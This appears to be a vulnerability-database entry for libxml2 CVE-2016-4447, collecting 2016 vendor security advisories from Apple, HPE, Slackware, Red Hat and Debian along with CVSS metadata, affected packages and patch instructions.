Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
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Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c05194709
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05194709 Version: 1
HPSBGN03628 rev.1 - HPE IceWall Federation Agent using libXML2 library, Remote Denial of Service (DoS), Unauthorized Modification, Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-07-07 Last Updated: 2016-07-07
Potential Security Impact: Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Security vulnerabilities in the libXML2 library could potentially impact HPE IceWall Federation Agent resulting in Remote Denial of Service (DoS), or unauthorized modification, or unauthorized disclosure of information.
References:
- CVE-2016-4447: Remote Denial of Service (DoS)
- CVE-2016-4448: Remote unauthorized disclosure of information, unauthorized modification, Denial of Service (DoS)
- CVE-2016-4449: Remote unauthorized disclosure of information, Denial of Service (DoS)
- PSRT110164
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- IceWall Federation Agent Version 3.0 (RHEL 6/7) using libXML2
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-4447
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-4448
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-4449
7.1 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
5.8 (AV:N/AC:M/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docI
d=emr_na-c01345499
RESOLUTION
HPE recommends applying the latest OS vendor security patches for libXML2 to resolve the vulnerabilities in the libXML2 library.
HISTORY Version:1 (rev.1) - 7 July 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz: Upgraded. Format string vulnerability (CVE-2016-4448). Inappropriate fetch of entities content (CVE-2016-4449). For more information, see: http://xmlsoft.org/news.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: c498433ae7d6077a9d5245877aa2c06e libxml2-2.9.4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: c92258a87bb30a6cdce2b5428d640bd5 libxml2-2.9.4-x86_64-1_slack14.0.txz
Slackware 14.1 package: 2b74b913a164a23ad2da10eebf923e46 libxml2-2.9.4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e2dee612c7de77822824e43a61414c2c libxml2-2.9.4-x86_64-1_slack14.1.txz
Slackware -current package: 98d1ede4a347a49f2ad972ac5339b9e6 l/libxml2-2.9.4-i586-1.txz
Slackware x86_64 -current package: c2d5721aac77b74d7e47a2a8a372d47a l/libxml2-2.9.4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
- CVE-2016-4594 : Stefan Esser of SektionEins
Installation note:
Instructions on how to update your Apple Watch software are available at https://support.apple.com/en-us/HT204641
To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About"
Show details on source website{
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"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-93266",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-4447",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-4447",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201605-637",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-93266",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-4447",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93266"
},
{
"db": "VULMON",
"id": "CVE-2016-4447"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-637"
},
{
"db": "NVD",
"id": "CVE-2016-4447"
}
]
},
"description": {
"_id": null,
"data": "The xmlParseElementDecl function in parser.c in libxml2 before 2.9.4 allows context-dependent attackers to cause a denial of service (heap-based buffer underread and application crash) via a crafted file, involving xmlParseName. Libxml2 is a C language-based function library for parsing XML documents developed by the GNOME project team. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. There is a security vulnerability in the \u0027xmlParseElementDecl\u0027 function in the parser.c file of Libxml2 2.9.3 and earlier. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: libxml2 security update\nAdvisory ID: RHSA-2016:1292-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2016:1292\nIssue date: 2016-06-23\nCVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 \n CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 \n CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 \n CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 \n CVE-2016-4448 CVE-2016-4449 \n=====================================================================\n\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\nA heap-based buffer overflow flaw was found in the way libxml2 parsed\ncertain crafted XML input. (CVE-2016-1834,\nCVE-2016-1840)\n\nMultiple denial of service flaws were found in libxml2. \n(CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447,\nCVE-2016-4448, CVE-2016-4449)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all applications linked to the libxml2\nlibrary must be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-python-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nppc64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.ppc64.rpm\n\ns390x:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm\nlibxml2-static-2.7.6-21.el6_8.1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\ni386:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-python-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-static-2.7.6-21.el6_8.1.i686.rpm\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.3.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.3.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.3.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-1762\nhttps://access.redhat.com/security/cve/CVE-2016-1833\nhttps://access.redhat.com/security/cve/CVE-2016-1834\nhttps://access.redhat.com/security/cve/CVE-2016-1835\nhttps://access.redhat.com/security/cve/CVE-2016-1836\nhttps://access.redhat.com/security/cve/CVE-2016-1837\nhttps://access.redhat.com/security/cve/CVE-2016-1838\nhttps://access.redhat.com/security/cve/CVE-2016-1839\nhttps://access.redhat.com/security/cve/CVE-2016-1840\nhttps://access.redhat.com/security/cve/CVE-2016-3627\nhttps://access.redhat.com/security/cve/CVE-2016-3705\nhttps://access.redhat.com/security/cve/CVE-2016-4447\nhttps://access.redhat.com/security/cve/CVE-2016-4448\nhttps://access.redhat.com/security/cve/CVE-2016-4449\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm\nZsVLEgJAF0Zt6xZVzqvVW7U=\n=fREV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u2. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-2 iOS 9.3.3\n\niOS 9.3.3 is now available and addresses the following:\n\nCalendar\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A maliciously crafted calendar invite may cause a device to\nunexpectedly restart\nDescription: A null pointer dereference was addressed through\nimproved memory handling. \nCVE-2016-4592 : Mikhail\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may disclose image data from\nanother website\nDescription: A timing issue existed in the processing of SVG. \nCVE-2016-4587 : Apple\n\nWebKit JavaScript Bindings\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to script\nexecution in the context of a non-HTTP service\nDescription: A cross-protocol cross-site scripting (XPXSS) issue\nexisted in Safari when submitting forms to non-HTTP services\ncompatible with HTTP/0.9. This issue was addressed by disabling\nscripts and plugins on resources loaded over HTTP/0.9. \nCVE-2016-4651 : Obscure\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: A cross-site scripting issue existed in Safari URL\nredirection. \nCVE-2016-4585 : Takeshi Terada of Mitsui Bussan Secure Directions,\nInc. \nCVE-2016-4584 : Chris Vienneau\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the 